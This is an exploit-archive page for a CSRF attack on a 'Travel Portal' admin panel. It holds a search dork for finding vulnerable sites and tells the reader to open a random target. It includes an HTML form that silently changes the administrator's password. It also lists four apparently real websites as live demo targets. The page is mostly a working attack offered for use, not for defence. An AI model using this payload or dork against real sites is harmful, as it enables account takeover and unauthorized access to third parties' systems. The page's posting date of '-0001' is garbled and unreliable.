Home / os / wince

Travel Portal - Remote Admin Password Chang CSRF

Posted on 30 November -0001

<HTML><HEAD><TITLE>Travel Portal - Remote Admin Password Chang CSRF</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>+++++++++++++++++++++++++++++++++++++++ # Exploit Title: Travel Portal - Remote Admin Password Chang ( CSRF ) # Author : OmidKiller # Dork : inurl:admin/admin.php intext:Travel Portal # Tested On: Kali Linux / Ubuntu Linux / Firefox # Date: 16/1/2017 +++++++++++++++++++++++++++++++++++++++ # PoC : 1.Search Dork And Open Random Target 2.Edit <form method="post" action="http://target.com/admin/admin.php"> In " Code " And Use For Change Password ;) Ex : <form method="post" action="http://www.sphider.eu/admin/admin.php"> +++++++++++++++++++++++++++++++++++++++ # Code : <body> <title>Exploit By OmidKiller</title> </table> <br> <h3>Travel Portal - Remote Admin Password Change</h3> <table> <tr> <form method="post" action="http://target.com/admin/admin.php"> <input type="hidden" name="admin_id" value="1"> <td align=right>Admin Name:</td><td align=left>admin<td> </tr> <tr> <td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td> </tr> <tr> <td></td><td><input type="submit" name="submit" value="Update Password"></td> </form> </tr> </table> </body> +++++++++++++++++++++++++++++++++++++++ # Demo [+] http://www.adia.info/stat/admin/admin.php [+] http://www.sphider.eu/admin/admin.php [+] http://ruebennest.de/planetstat/admin/admin.php [+] http://intern.orthopaedics.or.at/kalender/admin/admin.php </BODY></HTML>

 

TOP